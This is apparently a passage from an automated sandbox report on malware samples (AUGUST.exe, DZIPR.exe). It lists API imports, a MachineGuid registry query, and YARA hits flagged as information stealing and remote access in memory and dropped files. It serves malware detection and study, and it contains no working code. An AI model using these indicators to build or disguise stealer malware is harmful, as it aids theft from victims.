Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z, 16_2_00401626
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA5D72B __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 17_2_6FA5D72B
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA, 16_2_00404FAA
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED

Remote Access Functionality

Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED